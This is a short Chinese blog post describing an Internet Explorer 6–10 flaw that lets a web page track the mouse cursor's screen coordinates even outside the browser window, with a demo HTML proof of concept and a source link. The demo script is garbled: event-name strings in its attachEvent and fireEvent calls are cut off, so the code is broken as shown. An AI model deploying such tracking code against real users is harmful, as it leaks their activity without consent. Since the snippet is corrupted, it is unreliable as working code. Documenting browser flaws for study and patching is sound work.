刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标座标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。
影响版本:IE6-10
测试:
在系统目录下新建一个html文件,代码如下:
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Exploit Demo</title> <script type="text/javascript"> window.attachEvent(" function() { var detector = document.getElementById("detector"); detector.attachEvent(" function (e) { detector.innerHTML = e.screenX + ", " + e.screenY; }); setInterval(function () { detector.fireEvent(" }, 100); }); </script> </head> <body> <div id="detector"></div> </body> </html>
用IE打开新建的html文件
http://perlin.blog.51cto.com/1202304/1123397